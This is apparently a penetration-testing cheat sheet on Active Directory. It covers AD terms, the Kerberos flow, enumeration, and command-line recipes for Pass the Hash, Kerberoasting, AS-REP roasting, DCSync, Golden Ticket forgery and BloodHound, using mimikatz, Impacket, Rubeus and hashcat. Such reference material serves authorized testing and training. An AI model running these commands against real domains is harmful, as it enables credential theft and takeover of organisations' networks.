Active Directory Basics
Key Concepts
| Term | Description |
|---|---|
| Domain | Logical group of network objects |
| Forest | Collection of one or more domains |
| DC | Domain Controller — authenticates users |
| OU | Organizational Unit — container for objects |
| GPO | Group Policy Object — settings applied to users/computers |
| SID | Security Identifier — unique ID for every object |
| LDAP | Protocol used to query AD |
| Kerberos | Authentication protocol used by AD |
| NTLM | Legacy authentication protocol |
Enumeration
# Domain info
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$env:USERDOMAIN
$env:LOGONSERVER
# Using net commands
net user /domain # All domain users
net group /domain # All domain groups
net group "Domain Admins" /domain # Members of Domain Admins
net accounts /domain # Password policy
# PowerView
Get-NetDomain
Get-NetUser
Get-NetGroup
Get-NetComputer
Get-NetDomainController
Find-LocalAdminAccess # Find hosts where you're local adminKerberos Authentication Flow
1. Client → KDC: AS-REQ (request TGT)
2. KDC → Client: AS-REP (TGT encrypted with krbtgt hash)
3. Client → KDC: TGS-REQ (request service ticket using TGT)
4. KDC → Client: TGS-REP (service ticket)
5. Client → Service: AP-REQ (authenticate with service ticket)Common AD Attacks
Pass the Hash (PtH)
# Use NTLM hash instead of password
mimikatz # sekurlsa::pth /user:admin /domain:corp.local /ntlm:HASH /run:cmd.exe
# With impacket
python psexec.py domain/user@IP -hashes :NTLMHASHKerberoasting
# Find SPNs
Get-NetUser -SPN | Select SamAccountName, ServicePrincipalName
# Request and crack service tickets
# Impacket
python GetUserSPNs.py domain/user:pass -dc-ip IP -request
# PowerView + Rubeus
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash | Out-File hashes.txt
.\Rubeus.exe kerberoast /format:hashcat /output:hashes.txt
# Crack with hashcat
hashcat -m 13100 hashes.txt wordlist.txtAS-REP Roasting
# Find users with Kerberos pre-auth disabled
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true}
# Impacket
python GetNPUsers.py domain/ -usersfile users.txt -dc-ip IP -format hashcat
# Crack
hashcat -m 18200 hashes.txt wordlist.txtDCSync
Requires: Replication rights (Domain Admin or delegated)
Mimics DC replication to pull NTLM hashesmimikatz # lsadump::dcsync /domain:corp.local /user:Administrator
# Impacket
python secretsdump.py domain/user:pass@DC-IPGolden Ticket
Requires: krbtgt NTLM hash
Forges a TGT — valid for 10 years by defaultmimikatz # kerberos::golden /user:Administrator /domain:corp.local /sid:DOMAIN-SID /krbtgt:HASH /pttBloodHound
Graph-based AD attack path analysis.
# Collect data with SharpHound
.\SharpHound.exe -c All
# Or with PowerShell
Invoke-BloodHound -CollectionMethod AllUpload ZIP to BloodHound GUI → find shortest path to Domain Admin.
Useful Tools
| Tool | Purpose |
|---|---|
| BloodHound | Attack path visualization |
| PowerView | AD enumeration |
| Rubeus | Kerberos attacks |
| Mimikatz | Credential dumping |
| Impacket | Remote AD attacks |
| CrackMapExec | Network-wide enumeration |
| ADExplorer | GUI AD browser |